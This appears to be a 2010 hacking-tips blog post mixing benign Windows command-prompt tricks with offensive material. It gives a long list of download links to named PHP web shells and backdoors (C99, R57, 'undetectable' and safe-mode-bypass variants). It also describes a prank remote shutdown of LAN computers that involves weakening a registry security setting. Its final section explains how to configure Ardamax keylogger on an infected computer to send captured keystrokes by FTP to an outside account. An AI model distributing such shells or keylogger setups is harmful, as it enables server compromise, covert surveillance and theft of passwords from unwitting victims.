Monday, December 13, 2010

tracing ip address location of website
Click on start menu
then select run and type cmd
then enter the following command
"tracert (name of the website) eg: tracert http://www.youtube.com
then press enter button

it will show many ipaddresses how the ip address is travelling.
then select the last shown ipaddress,shown inside brackets and copy it

then open the browser and enter the following url

http://www.ip-address.com/ipaddresstolocation/

then paste the ip address in the find location text.

then it will show where the ipaddress location is.

lets try its very interesting. Using this url address we can find out our ip address location also.
PHP Shells

PHP Shell is a shell wrapped in a PHP script. It’s a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver. This replaces, to a degree, a normal telnet connection, and to a lesser degree a SSH connection.

You use it for administration and maintenance of your website, which is often much easier to do if you can work directly on the server. For example, you could use PHP Shell to unpack and move big files around. All the normal command line programs like ps, free, du, df, etc… can be used.

Download PHP Shells.

Password for all links :- rocks

_GsC__shell

http://www.4shared.com/file/yX1cvplV/_GsC__shell.html


0x00_PHP_shell

http://www.4shared.com/file/_VKM9keP/0x0...shell.html


_Andr3a92__Sh3ll

http://www.4shared.com/file/tp1BeFXQ/_An...h3ll_.html


__Cod3rZ_Shell__

http://www.4shared.com/file/DxAxWgWL/__C...ell__.html

Ajax_PHP_Command_Shell



http://www.4shared.com/file/wZjZMcxJ/Aja...Shell.html



Anti_Chat_Shell

http://www.4shared.com/file/3Z2B2nrx/Ant...Shell.html

AYT_Shell

http://www.4shared.com/file/bqCBnhbT/AYT_Shell.html

Azrail_Php_Shell



http://www.4shared.com/file/fdWWiC27/Azr...Shell.html


Backup_SQL_Shell

http://www.4shared.com/file/AxgPSH0u/Bac...Shell.html


Bl0od3r_Priv8_Shell

http://www.4shared.com/file/CGovUJF1/Bl0...Shell.html



Bypass_User

http://www.4shared.com/file/HqWSkCv8/Bypass_User.html


C99_Original_Shell



http://www.4shared.com/file/WP0GpDIn/C99...Shell.html


C99_Original_Shell__Underdetec

http://www.4shared.com/file/RNftEbFr/C99...detec.html

C99_Saldiriorg_version



http://www.4shared.com/file/Io6wN-VJ/C99...rsion.html

C100_Yarakam_Modified_Shell



http://www.4shared.com/file/47WPrSe-/C10...Shell.html

CGI_Telnet

http://www.4shared.com/file/VI5YA-wG/CGI_Telnet.html

CShell

http://www.4shared.com/file/KisHKKYc/CShell.html

CTT_Shell

http://www.4shared.com/file/nCmCitXR/CTT_Shell.html


Cyber_Shell

http://www.4shared.com/file/7omydtGQ/Cyber_Shell.html

Dark-Shell

http://www.4shared.com/file/jnEEI3rY/Dark-Shell.html

DC3_Shell__Priv8

http://www.4shared.com/file/q_0GoDsn/DC3...riv8_.html

Dive_Shell

http://www.4shared.com/file/tfwyFvGr/Dive_Shell.html

DTool_Pro_Shell

http://www.4shared.com/file/-auj9Kmj/DTo...Shell.html


DX_Shell

http://www.4shared.com/file/jqlEXYbM/DX_Shell.html


Erne_Safe_Mode_Bypass_Shel

http://www.4shared.com/file/9fKu9ypj/Ern...Shell.html

Fake_email Shell

http://www.4shared.com/file/8KGZei36/Fake_email.html

G00nShell

http://www.4shared.com/file/BpiG9rcz/G00nShell.html

GFS_Shell


http://www.4shared.com/file/E_f9yH5p/GFS_Shell.html


GNY_Shell

http://www.4shared.com/file/Vss8Cu5a/GNY_Shell.html

H4NTU1_Shell

http://www.4shared.com/file/VYCyexWQ/H4NTU1_Shell.html


Heykir_Shell

http://www.4shared.com/file/88BV2gwN/Heykir_Shell.html

HiddenShell

http://www.4shared.com/file/YP8LaVZP/HiddenShell.html

iMHaP_FTP_Shell

http://www.4shared.com/file/vl1lhnTl/iMH...Shell.html

Iron1_Shell

http://www.4shared.com/file/kqP5jQiC/Iron1_Shell.html

http://www.4shared.com/file/PHy19Lhz/Iron_Shell.html

JsBack_-_Shell_Backdoor

http://www.4shared.com/file/LcjIeYYA/JsB...kdoor.html

JSP_Shell

http://www.4shared.com/file/c7qoc0D6/JSP_Shell.html

Kacak_Shell

http://www.4shared.com/file/hQdJTadf/Kacak_Shell.html

KADot_Shell

[/size][/size]http://www.4shared.com/file/-6mBbdbQ/KADot_Shell.html


Lama_Shell

http://www.4shared.com/file/UPHWmy28/Lama_Shell.html

Liz0zim_Shell

http://www.4shared.com/file/OB7nOU9J/Liz0zim_Shell.html

Load_Shell

http://www.4shared.com/file/XIE5ANyW/Load_Shell.html

lostDC_shell

http://www.4shared.com/file/gn2_vnkp/lostDC_shell.html

Mackers_Private_PHPShell

http://www.4shared.com/file/UubJhaJ7/Mac...Shell.html


Moroccan_Spamers_Shell

http://www.4shared.com/file/1Nk_AcAG/Mor...Shell.html

MyShell_Shell

http://www.4shared.com/file/JlEIt3IU/MyShell_Shell.html

MySQL_Interface_Shell

http://www.4shared.com/file/WR7mQEDK/MyS...Shell.html

N3fa5t1cA_Sh3ll

http://www.4shared.com/file/4W0g887i/N3f...Sh3ll.html


N3tShell_Emp3ror_Undetectable

http://www.4shared.com/file/oU-2A_xW/N3t...able_.html

N_Shell

http://www.4shared.com/file/OtOUZ5Lw/N_Shell.html

NCC_Shell

http://www.4shared.com/file/OmgPsHuo/NCC_Shell.html

Network_File_Manager_PHP_Shell

http://www.4shared.com/file/V34e7DRy/Net...Shell.html

Nexpl0rer_Shell

http://www.4shared.com/file/RtwOsvuo/Nex...Shell.html


Nix_Remote_Shell

http://www.4shared.com/file/86Of7PRy/Nix...Shell.html

NST_Shell

http://www.4shared.com/file/0UqJ4hZ3/NST_Shell.html

okno_Shell

http://www.4shared.com/file/vN8Q1-eN/okno_Shell.html

OnBoomShell

http://www.4shared.com/file/KnpXFJMX/OnBoomShell.html

PH_Vayv_Shell

http://www.4shared.com/file/vbf77aPi/PH_Vayv_Shell.html

PHANTASMA_Shell

http://www.4shared.com/file/JExrHLos/PHA...Shell.html

PHP_black_shell_that_pwnz_C99

http://www.4shared.com/file/WPpjJJSY/PHP...z_C99.html


PHP_Bypass_Shell

http://www.4shared.com/file/zfiuPrpu/PHP...Shell.html

PHP_Include_With_Shell



http://www.4shared.com/file/WntNAeua/PHP...Shell.html

PHP_Inj_Shell

http://www.4shared.com/file/j7qhZhS2/PHP_Inj_Shell.html


http://www.4shared.com/file/tRJ2E4xb/PHP...Shell.html

http://www.4shared.com/file/1RwfnLln/PHP...Shell.html

R57_IFX_Modified_Shell

http://www.4shared.com/file/FAwRif1l/R57...Shell.html

R57_Kartal_Modified_Shell

http://www.4shared.com/file/JDaMOZZZ/R57...Shell.html

R57_Mohajer22_Shell

http://www.4shared.com/file/oYjj9Hmz/R57...Shell.html

R57_New_Year_Edition_Shell



http://www.4shared.com/file/Tg4CHDbs/R57...Shell.html


R57_ORIGINAL_Shell



http://www.4shared.com/file/dCTc26AN/R57...Shell.html

Remview_Shell

http://www.4shared.com/file/vhwb_KQj/Remview_Shell.html

Root_Access_Shell

http://www.4shared.com/file/3Hy_Lfkt/Roo...Shell.html

S72_Shell

http://www.4shared.com/file/LGpkuZ8U/S72_Shell.htmlhttp://

s101

http://www.4shared.com/file/9zQDaQXz/s101.html

Safe_Mode_Bypass_PHP_442__512_

http://www.4shared.com/file/H347Kn5s/Saf..._512_.html

SIM_Attacker_Shell

http://www.4shared.com/file/lVoQbZeQ/SIM...Shell.html

simple_php_backdoor

http://www.4shared.com/file/sgfSLqfd/sim...kdoor.html

SnIpEr_SA_Shell

http://www.4shared.com/file/72OCGzXr/SnI...Shell.html

StAkeR__Shell

http://www.4shared.com/file/iuy8xvPp/StAkeR__Shell.html

Stres_Bypass_Shell

http://www.4shared.com/file/kWn2TYhL/Str...Shell.html
POPULAR COMMAND PROMPT TRICKS
Save A List of Files to a Text File by Extension

dir *.ext /s /b > files.txt

This command line will create a file called files.txt. When you open this file, there will be a complete list of all the files in that directory and all subdirectories with the .ext extension. You can then open up this text file in any text editor and work this the information.By changing the ext part, you can select different files. For example, if you wanted to list all of the PDF documents, you would type:

dir *.pdf /s /b > files.txt
Get Your IP Address Information

ipconfig /all

This will retrieve a pile of information about your network connection and IP information. From this command, you can get:

Host Name
Primary DNS Suffix
Node Type
IP Routing Enabled
WINS Proxy Enabled
DNS Suffix Search List
Connection-specific DNS Suffix
Network Adapter Description
Physical (MAC) Address
DHCP Enabled
IP Address
Subnet Mask
Default Gateway
DNS Servers

Get Installed Driver Information

driverquery

It can be very useful when troubleshooting to know what drivers are installed on a system. This command will give you a complete listing of the drivers and when they were installed.
Copy Files Via Infrared Port

irftp filename.ext

This will fire up the Wireless Link dialog so that you can copy the specified file via an infrared port.
Find Files Opened By Network Users

openfiles /query

If you are running a system and you want to know who has files open on your computer, this command will provide you a list of those users and the files that they have open.

Note: If you get an error saying The system global flag ‘maintain objects list’ needs to be enabled to see local opened files, you can fix this issue by typing openfiles /local on. You will have to reboot the system but it will resolve the issue.

Monitor Port Activity

netstat -a 30

This will show you all of the TCP/IP ports that are being used on your system and what they are connecting to (or being connected from). It will continue to monitor these ports and refresh the information every 30 seconds. You can change the refresh rate by changing the number at the end of the command.


Recover Information From A Corrupt File

recover filename.ext

If you have a disk with damaged sectors, you can attempt to recover as much information as possible from the damaged file. Data that is not damaged can be retrieved but data in damaged sectors will be lost.
Defragment Remote Computer

rexec remotePC defrag C: /F

This command used the rexec command to force a defragment of the C: drive on the computer named remotePC. You can use whatever you want to for the command (I just used defrag C: /F as an example). This is very useful for remote maintenance.
Retrieve Detailed System Information

systeminfo

With this command, you can retrieve the following information:

Host Name
OS Name
OS Version
OS Manufacturer
OS Configuration
OS Build Type
Registered Owner
Registered Organization
Product ID
Original Install Date
System Up Time
System Manufacturer
System Model
System type
Processor(s)
BIOS Version
Windows Directory
System Directory
Boot Device
System Locale
Input Locale
Time Zone
Total Physical Memory
Available Physical Memory
Virtual Memory Max Size
Virtual Memory Available
Virtual Memory In Use
Page File Location(s)
Domain
Logon Server
Hotfix(s)
NetWork Card(s)

Automatically Defragment C: Daily

schtasks /create /tn "Defrag C" /tr "defrag c: /f" /sc daily /st 23:00:00 /ru "System"

This will set your computer to automatically perform a complete defrag of the C: drive each day at 11:00:00 PM (23:00:00). It does this by creating a scheduled task called Defrag C. It will run this command under the computer’s system account.
Map A Drive Letter to a Folder

subst W: C:\windows

Sometimes, your directory structure can get pretty deep and complicated. You can simplify this a bit by mapping a drive letter to commonly used folders. In the example that I have given, this will create a drive letter W: and map it to the C:\windows directory. Then, whenever you go into My Computer, you will see a W: drive and when you browse to it, it will automatically take you to the contents of the C:\windows folder.

You can do this with any unused drive letter and any folder that exists on your system.
List All Tasks Running On The Computer

tasklist

It’s always good to know what is running on your system. This is the command line version of the processes tab in Taks Manager.
Kill A Program

taskkill /im programname.exe /f

If, when using the tasklist command, you discover that there is something running you just want killed. This is the way to do it! Just note the program name and use it in place of programname.exe.
Reboot a Remote Computer

shutdown -r -f -m \\remotePC -c "System will be rebooted in 20 seconds"

Sometimes, you just need to reboot a system. This will do it remotely and give the user a 20 second warning.
CHAT WITH COMMAND PROMPT
If you want a private chat with a friend or client on your Network, you don't need to download any fancy program!
All you need is your friends IP address and Command Prompt.

Firstly, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact.
After this, you should see this:

Message:

Now type in the message you wish to send.
Before you press "Enter" it should look like this:

MESSENGER
User: 56.108.104.107
Message: Hi

Now all you need to do is press "Enter", and start chatting!

Hi friends, if u are getting confused,
I'll explain you how to do it![/b]
open notepad
type this

@ echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

now click on file
click on save as
and then give it the name messenger.bat
click save

now goto control panel
click on administrative tools(switch to classic view)
then click on services
then find messenger service
open it
you'll see startup type which would be disabled
so click on that and select manual
now press the start button and apply

now do the same on the remote computer
until this service is activated on that pc, you won't be able to use this

now click on that file you made
type the ip
type the message
and enter

there you go!

SHUT DOWN ANY PC ON YOUR LAN USING COMMAND PROMPT

This trick will shutdown a selected pc from Your LAN network. You can apply this trick in your office or school.. but i take no responsibilities fro any action. Its just for fun. Here is how to use this trick :

1. Go to Start > Run and type in cmd

2. You will see the command prompt window . Now type in this command line.

shutdown.exe -i

And hit Enter. You will see remote shutdown Window. If you know someone’s IP on a computer in your Local Area network, type in their IP Address after clicking the add button.

3. After entering the IP Address click OK . Now watch the person’s face as their computer shuts down.

Some friends have asked me that they got Access Denied error for remote shutdown. Add the user with the privilege to force a remote shutdown on the computer you are about to Shutdown.To do this go to control panel > Administrative Tools > Local Security Settings. Now go to Security Settings > Local Policies > User Rights Assignment. Double-click on Force shutdown from a remote system in the right pane and Click on Add User or Group. Add the computer that runs the remote shutdown command.


Or you can do this go the computer you are about to Shutdown
a) Go to Start > Run > type in Regedit in the dialog box and hit enter
b) Go to My Computer/HKEY_LOCAL_MACHINE /system/currentcontrolset/control/lsa
c) Find “forceguest” in the right pane Double click on it to modify This entry change the value from “1″ entry to “0″

how to use a key logger

Recieving logs of a keylogger infected computer via ftp
Requirements :
1) Ardamax Keylogger
2) An Account on drivehq ( Make one its free )

Procedure

1) Create an account oh drivehq.com its easy to make an account and its all free



2) Login to your drivehq account and click on new folder as shown in the picture



3) Right click on the icon of ardamax kelogger at the bottom right of the taskbar and click on options



4) Now you have to click on Delivery option which has a feature of ftp and enter the information as shown in the picture ... where u will be givin ur path on drive hq

PS enter the login pass of drivehq.com the account one which u just made

Once you enter all the credentials properly click on test to check wether the connection is successfully established or no



5) Then go to the Control to do the Log settings as to how u want the logs to come ... here you have to click on the delivery method and select ftp so tht the logs are sent on ftp


6) click ok and ardamax will minimize ...

VOILA ALL THE LOGS WILL GO DIRECTLY TO THE drivehq account you made using ftp .... cheers have fun

comments appreciated

Anti Keylogger Shield

Anti Keylogger Shield


Anti Keylogger Shield is a powerful, easy to use anti-spy software tool that prohibits operation of keyloggers, known or unknown, professional or custom made. Once installed, Anti Keylogger Shield will run silently in your System Tray, it will block the system mechanisms that are exploited by keyloggers, and will immediately start protecting your privacy. With Anti Key logger shield you can hide and protect your keystrokes from prying eyes.





Keep your Keystrokes PRIVATE!


Keyloggers are small spy programs, that record everything you type on the computer, including documents, emails, user names and passwords, and then either stores this information in a hidden place on your computer or sends it over the Internet to the person who infiltrated it.
Keyloggers can come in many forms, as emails, viruses, Trojan horses; from people who might try to invade your privacy and see what you are typing, or remote hackers, who might want to steel user names and passwords as you type them.

DOWNLOAD